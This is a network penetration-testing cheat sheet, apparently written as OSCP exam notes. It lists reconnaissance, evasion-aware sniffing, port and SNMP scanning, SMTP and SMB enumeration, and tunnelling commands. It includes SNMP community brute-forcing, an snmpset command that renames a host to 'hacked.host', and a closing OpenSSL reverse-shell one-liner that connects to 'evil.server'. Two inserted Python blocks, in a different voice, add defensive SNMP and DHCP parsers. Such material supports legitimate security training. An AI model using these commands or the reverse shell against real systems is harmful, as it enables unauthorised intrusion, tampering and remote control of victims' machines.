
Last changed: 17.12.2018

Network pentesting


I started this command list for my Offensive Security Certified Professional exam. It summarizes some means to collect data and exploit vulnerabilities in a target network.

open source information


Search engines and public databases can be helpful to find additional information about the target network as well as email addresses of employees.

search engine research

www.exploit-db.com/google-dorks/
theharvester -d target.com -p all -l 200

dns lookup

dig target.com
dig -t aaaa target.com
dig -t axfr target.com @ns.target.com
fierce -dns target.com
dnsenum -f <dictfile> <domain>

target information

whois <domain>
whois <target_ip>
geoiplookup <target_ip>

bing ip search

ip:<target_ip>

passive network sniffing


If you are inside the network and want to avoid detection, passive sniffing will supply information about network clients without any interaction. Make sure that your machine is not requesting an IP via DHCP or sending IPv6 router/neighbor solicitations.

preparation

systemctl stop NetworkManager
killall dhclient
sysctl -w net.ipv6.conf.all.autoconf=0
sysctl -w net.ipv6.conf.all.accept_ra=0

dump traffic

tcpdump -i eth0 -s 262144 -w dump.pcap

monitor dns requests

passivedns -i eth0 -l /dev/stdout

passive os fingerprinting

p0f -i eth0 -o outfile

traffic analysis

To analyze the TCP streams in a pcap you can use tshark:

tshark -r dump.pcap -z conv,tcp -q | sed '1,5d;$d' | awk '{print $10 " " $1 " " $2 " " $3}' | sort -g | awk '{print NR-1,$0}'
tshark -r dump.pcap -z follow,tcp,ascii,0 -q

network scanning


host discovery

nmap -sn 192.168.11.0/24
nmap 192.168.11.0/24 -p 139 -oG grepable_output.txt
unicornscan 192.168.11.0/24:139

portscan

nmap -sS 192.168.11.2 -p1-65535
nmap -sU 192.168.11.2 -p1-65535

os detection

nmap -O -sV 192.168.11.2

finding transparent proxies

nmap -Pn <some_extern_host> --ttl 2 -T5

simple network management protocol


SNMP can be exploited for information gathering and, if you are lucky, to change settings on the host. The community strings of SNMPv1 and SNMPv2c get transmitted in clear text.

guess community string

nmap -Pn -sU <target> -p 161 --script=snmp-brute
onesixtyone -c <dictfile> -i <ip_list>

information gathering

To translate the OIDs into textual form, the package snmp-mibs-downloader might be needed.

snmpwalk -c public -v 2c -m ALL <target> 1
snmp-check -c public -v 2c <target>
nmap -Pn -sU <target> -p 161 --script=snmp-interfaces.nse
nmap -Pn -sU <target> -p 161 --script=snmp-processes.nse
nmap -Pn -sU <target> -p 161 --script=snmp-netstat.nse

change settings

snmpset -mALL -v1 -c secret <target> sysName.0 s hacked.host
snmpget -mALL -v1 -c secret <target> sysName.0
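Because SNMPv1/v2c carry the community string in clear text (see the note at the top of this section), a defender can recover it from any capture of port 161 traffic and flag hosts still using default names. The following is an added example, not part of the original list: a minimal BER walker that extracts the version and community from raw SNMP message bytes and audits a list of them. The sample packets are constructed inline; the OID and community values are assumptions for illustration.

```python
SNMP_VERSION = {0: "v1", 1: "v2c", 3: "v3"}
DEFAULT_COMMUNITIES = {"public", "private"}

def read_tlv(buf, pos):
    # One BER tag/length/value; returns (tag, value, position after it)
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                    # long form: low 7 bits = count of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_snmp(packet):
    # Returns (version, community) or None if the bytes are not an SNMP message
    tag, body, _ = read_tlv(packet, 0)
    if tag != 0x30:                      # outer SEQUENCE
        return None
    vtag, vval, pos = read_tlv(body, 0)
    if vtag != 0x02:                     # INTEGER version
        return None
    version = SNMP_VERSION.get(int.from_bytes(vval, "big"), "unknown")
    if version == "v3":
        return version, None             # v3 has no community string
    ctag, cval, _ = read_tlv(body, pos)
    if ctag != 0x04:                     # OCTET STRING community
        return None
    return version, cval.decode("ascii", "replace")

def audit(packets):
    # Flag every v1/v2c message: the community travels in the clear on UDP 161
    findings = []
    for i, pkt in enumerate(packets):
        parsed = parse_snmp(pkt)
        if parsed and parsed[1] is not None:
            version, community = parsed
            kind = "default-community" if community in DEFAULT_COMMUNITIES else "cleartext-community"
            findings.append((i, version, community, kind))
    return findings

def ber(tag, payload):  # short-form BER encoder, enough for the constructed samples below
    return bytes([tag, len(payload)]) + payload

def build_get(version, community, oid_bytes):
    # Constructed sample: a GetRequest PDU (0xA0) for a single OID
    varbind = ber(0x30, ber(0x06, oid_bytes) + ber(0x05, b""))
    pdu = ber(0xA0, ber(0x02, b"\x01") + ber(0x02, b"\x00") + ber(0x02, b"\x00") + ber(0x30, varbind))
    return ber(0x30, ber(0x02, bytes([version])) + ber(0x04, community) + pdu)

SYSNAME_OID = bytes.fromhex("2b06010201010500")          # 1.3.6.1.2.1.1.5.0 = sysName.0
SAMPLE = [build_get(1, b"public", SYSNAME_OID), build_get(0, b"s3cret", SYSNAME_OID),
          b"\x30\x03\x02\x01\x03"]   # v2c default community, v1 custom community, v3 header
```

Feeding the UDP payloads of real port-161 packets into audit() gives the same tuples; anything tagged default-community is the first thing to fix on the host.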

preboot execution environment


In a preboot execution environment (PXE), hosts boot their operating system from a server in the network. These boot files can be downloaded manually to examine their content. The needed locations can be found in the DHCP packets.

download pxe binary

tftp <next-server-ip-address>
get <boot-file-name>

extract config file name

strings <boot-file-name> | grep -i tftp -A1
tftp <next-server-ip-address>
get <config file>/default

download kernel and initrd

tftp <next-server-ip-address>
get <vmlinuz-file-from-config>
get <initrd-file-from-config>

mount network block device

modprobe nbd
nbd-client <target> -N /device/name /dev/nbd0 -persist
mount /dev/nbd0 /mnt/nbd
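The next-server address and boot file name that the tftp commands above need come from the DHCP OFFER/ACK: the fixed-header fields siaddr and file, or options 66 (TFTP server name) and 67 (bootfile name). The following is an added example, not part of the original list: a small parser that pulls those values out of the raw UDP payload of a DHCP message, plus a builder for constructed sample packets (the addresses and file names are assumptions; the parser prefers options 66/67 over the header fields, which is how PXE clients commonly behave).

```python
from ipaddress import IPv4Address

OPT_TFTP_SERVER, OPT_BOOTFILE, OPT_PAD, OPT_END = 66, 67, 0, 255
MAGIC = b"\x63\x82\x53\x63"          # DHCP magic cookie at offset 236

def parse_options(data):
    # Walk the option TLVs after the magic cookie into {code: raw value}
    opts, pos = {}, 0
    while pos < len(data):
        code = data[pos]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            pos += 1
            continue
        length = data[pos + 1]
        opts[code] = data[pos + 2:pos + 2 + length]
        pos += 2 + length
    return opts

def pxe_boot_params(packet):
    # Returns (next_server, boot_file) from a DHCP payload, or None if it is not DHCP
    if len(packet) < 240 or packet[236:240] != MAGIC:
        return None
    siaddr = str(IPv4Address(packet[20:24]))              # 'next server' in the fixed header
    file_field = packet[108:236].split(b"\x00", 1)[0]      # 128-byte 'file' field, NUL padded
    opts = parse_options(packet[240:])
    # Assumption: options 66/67 win when present, otherwise fall back to the header fields
    server = opts.get(OPT_TFTP_SERVER, siaddr.encode()).decode()
    boot_file = opts.get(OPT_BOOTFILE, file_field).decode()
    return server, boot_file

def build_offer(siaddr, file_field=b"", options=b""):
    # Constructed sample DHCP OFFER with only the fields this parser looks at filled in
    hdr = bytearray(236)
    hdr[0:2] = b"\x02\x01"                                  # op=BOOTREPLY, htype=ethernet
    hdr[20:24] = IPv4Address(siaddr).packed
    hdr[108:108 + len(file_field)] = file_field
    return bytes(hdr) + MAGIC + options + bytes([OPT_END])

def opt(code, value):
    return bytes([code, len(value)]) + value

SAMPLE_HEADER_ONLY = build_offer("192.168.11.5", b"pxelinux.0")
SAMPLE_WITH_OPTIONS = build_offer("0.0.0.0", options=opt(53, b"\x02")
                                  + opt(OPT_TFTP_SERVER, b"192.168.11.9") + opt(OPT_BOOTFILE, b"boot/pxelinux.0"))
```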

universal plug and play


discover services

echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:rootdevice\r\n\r\n' | nc -uw 1 <target> 1900
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:all\r\n\r\n' | nc -uw 1 <target> 1900

get service control point definition

curl http://192.168.0.1:49000/igddesc.xml

simple object access protocol example

POST /igdupnp/control/WANIPConn1 HTTP/1.1
Accept-Encoding: identity
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
Host: 192.168.0.1:49000
Connection: close
Content-Type: text/xml
Content-Length: 300

<?xml version="1.0"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <m:GetExternalIPAddress xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
    </m:GetExternalIPAddress>
  </s:Body>
</s:Envelope>

simple mail transfer protocol


find mail server

dig -t mx <target>

get own domain name

dig -x `curl -s ifconfig.co` | grep -A1 "ANSWER SECTION"

manual tls connect

openssl s_client -connect <target>:<port> -ign_eof
HELO my.domain.name
MAIL FROM: <nobody@tempmail.de>
RCPT TO: <admin@shitmail.de>
DATA
Subject: foobar

Hello,
Bye.
.
QUIT

enumerate users

smtp-user-enum -M RCPT -U <userlist> -D <target.domain> -t <host>

netbios discovery


nbtscan -r 192.168.11.0/24
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script smb-check-vulns.nse
rpcclient -U "" 192.168.11.2

tunneling


clear to ssl forwarding

socat TCP4-LISTEN:25,fork,reuseaddr OPENSSL:target.com:465,verify=0

IPv4 to IPv6 forwarding

socat TCP4-LISTEN:25,fork,reuseaddr TCP6:target.com:25

local tunnel (opens 31337 on client)

ssh -g -L 31337:target:445 user@ssh-server
plink.exe -g -L 31337:target:445 -l user -pw password ssh-server

remote tunnel (opens 31337 on server)

ssh -g -R 31337:target:445 user@ssh-server
plink.exe -g -R 31337:target:445 -l user -pw password ssh-server

openssl backconnect shell


start server

openssl req -x509 -nodes -sha256 -subj "/CN=evil.server" -newkey rsa:2048 -keyout evil.pem -out evil.pem
openssl s_server -cert evil.pem

start client

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect evil.server:4433 > /tmp/s; rm /tmp/s